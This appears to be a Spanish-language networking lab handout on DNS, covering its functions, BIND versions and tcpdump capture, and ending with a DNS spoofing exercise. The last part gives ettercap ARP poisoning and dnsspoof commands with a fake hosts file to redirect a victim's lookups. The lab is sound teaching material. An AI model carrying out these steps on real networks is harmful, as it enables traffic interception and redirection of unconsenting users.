Bajar de la pagina los archivos de configuracion de DNS y adaptarlos a Knoppix 1. DNS (Domain Name System) DNS es un servicio que permite : + Traducir nombres de computadoras en direcciones IP. + Organiza los nombres por medio de un esquema jerarquico denominado dominios + Traduce tambien de direccion IP a nombre (traduccion inversa) + Permite dar distintos nombres a un mismo nodo de DNS (Alias) + Se puede indicar cual es el servidor o servidores de correo de un dominio (Mail Exchanger) + Existen servidores DNS secundarios para respaldar el funcionamiento de servicio + Usa protocolo UDP para casi todas sus transacciones, en el puerto 53 tipicamente. Solo usa protocolo TCP para transferencia de información con los servidores secundarios + Utiliza un sistema de cache para ahorrar peticiones de resolución. + Se apoya en los servidores raiz para poder resolver aquellas peticiones que no conoce. + Una computadora cliente puede utilizar uno o mas servidores DNS. 2. BIND BIND es el nombre del programa ejecutable que permite atender y administrar DNS (Berkeley Internet Name Daemon) BIND 4.x - Primera version BIND 8.x - Version con cambios importantes en la arquitectura del programa, pero muy dificil de entender en código, incorporo esquemas de seguridad BIND 9.x - La versión con un código mantenible /usr/sbin/named -v Tipicamente se puede corre en sistemas UNIX 3. Análisis de trafico DNS Con TCPdump se puede checar el trafico de DNS tcpdump 4. Spoof de DNS 1. Se necesita el programa dnsspoof, que se corre sobre la maquina atacante 2. Una maquina victima, la cual va a recibir respuestas DNS falsificadas. Por ejemplo, sin ataque nslookup www.xxx.com 66.28.153.14 3. En la maquina atacante se debe activar ettercap y hacer un arpspoof (seleccionar la maquina victima y al ruteador) 4. En la maquina atacante editar el archivo vi /ramdisk/home/knoppix/fakedns y agregar 127.0.0.1 *.xxx.com 5. dnsspoof -f /ramdisk/home/knoppix/fakedns host victimaIP 6. En la victima nslookup www.xxx.com 127.0.0.1